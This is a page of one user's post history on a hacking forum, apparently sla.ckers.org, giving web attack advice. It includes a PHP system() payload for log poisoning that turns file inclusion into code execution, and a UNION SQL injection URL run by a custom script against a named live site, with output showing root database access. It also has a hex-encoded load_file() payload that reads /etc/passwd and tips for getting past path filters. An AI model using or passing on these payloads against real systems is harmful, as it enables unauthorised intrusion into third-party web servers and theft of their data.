Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 

Current Page: 1 of 1
Results 1 - 21 of 21
2 years ago
alexfoo
I've been meaning to answer this thread for a while. /proc/self/environ is no more.. I don't know if it's removed from the main line kernel but debian and ubuntu atleast don't have the file any more. There's other ways to turn LFI to RCE. Try including the access_log after you've accessed any file with your user-agent spoofed to '<?php system($_GET); ?>' or something. Be creative! Ther
Forum: SQL and Code Injection
3 years ago
alexfoo
You have two options: 1 (least likely): Find a way to set the username in your session. 2 (also not very likely): local session poisoning http://ha.xxor.se/2011/09/local-session-poisoning-in-php-part-1.html http://ha.xxor.se/2011/09/local-session-poisoning-in-php-part-2.html http://ha.xxor.se/2011/09/local-session-poisoning-in-php-part-3.html Have fun
Forum: SQL and Code Injection
3 years ago
alexfoo
Can't sqlmap help you? It does postgres if i remember correctly.
Forum: SQL and Code Injection
3 years ago
alexfoo
It is probably some kind of one way crypto, stored in a binary format of eight bits. Des perhaps?
Forum: SQL and Code Injection
3 years ago
alexfoo
If lower() and upper() works, so should unhex()
Forum: SQL and Code Injection
4 years ago
alexfoo
It is not possible to do sqli on that url. Maybe on the site, but not there.
Forum: SQL and Code Injection
4 years ago
alexfoo
Maybe the colon (:) is the problem. It's usually filtered to avoid data://
Forum: SQL and Code Injection
4 years ago
alexfoo
I'm only guessing here but maybe the .php-file needs +x to be executed by the webserver. The webserver version is "Apache/Nginx/Varnish" which seems pretty unusual.
Forum: SQL and Code Injection
4 years ago
alexfoo
It is unpossible to call load_file without parantheses. Your only hope is if you can urlencode then () to %28 and %29.
Forum: SQL and Code Injection
4 years ago
alexfoo
' starts a string, a string is not executed as a query. but why do you fuck around with substring and stuff if it's not a blind injection?
Forum: SQL and Code Injection
4 years ago
alexfoo
/etc/shadow is only readable by root, mysqld is ran by nobody (or similar low-privilege user).
Forum: Full Disclosure
4 years ago
alexfoo
I got tired of doing the same kind of checks to all pages I find vulnerable, so I hacked together a little script to do some stuff for me. $ perl sqlfu.pl "http://www.helsingborgsutstallningar.se/page.asp?id=-1%20union%20select%201,2,,4,5,6,7,8" SQLfU Version: 5.0.22-community-nt User: root@localhost Found table |ads|Id,filename,itext,url,itext_eng|int,varchar,text,varchar,text|
Forum: SQL and Code Injection
4 years ago
alexfoo
Regarding the last post: The page probably use the id= parameter in two different queries with different numbers of columns in the result. But I'm just guessing though.
Forum: SQL and Code Injection
4 years ago
alexfoo
My guess is that the code looks kinda like this: $res = mysql_query( "select url from foo where id = ".$_GET ); $row = mysql_fetch_array( $res ); header( "Location: ".$row[ );]
Forum: SQL and Code Injection
4 years ago
alexfoo
Looks like pizzamarketplace fixed their shit, but I'll try to answer anyway. a) my guess is that you got an error saying something about mismatched ', causing the guy who discovered this to think the site did not properly scrub the input. my guess is that the query looked like this: SELECT * FROM foo WHERE bice = $_GET b) the t parameter is useless c) can't get this to work but yes, it
Forum: SQL and Code Injection
4 years ago
alexfoo
Is it just me or are most of the vuln sites in .br? :p
Forum: SQL and Code Injection
4 years ago
alexfoo
@Reiners: That's what i thought, thanks :-)
Forum: SQL and Code Injection
4 years ago
alexfoo
@hc0de: Just the stuff i was looking for, thanks :-)
Forum: SQL and Code Injection
4 years ago
alexfoo
hai i found a page that lets me include everything i want, as long as it does not contain the string '../'. '..', '/' and './' works. suggestions on how i can solve this puzzle? impossible? TIA
Forum: SQL and Code Injection
4 years ago
alexfoo
hai i'm trying out some sqlinjections but i'm having trouble with load_file(). has it become common practice to block load_file on the sql-server or am i doing something wrong? this is what i use: /index.php?page=news&id=168%20and%201=2%20union%20select%201,2,3,4,5,load_file(0x2F6574632F706173737764),7,8,9,10,11 i tried load_file('/etc/passwd') but that gave me a php error the s
Forum: SQL and Code Injection
4 years ago
alexfoo
I usually try to find temporary files that editors leave behind, like foo.php~ and stuff like that. Or try to find a LFI.
Forum: Full Disclosure
Current Page: 1 of 1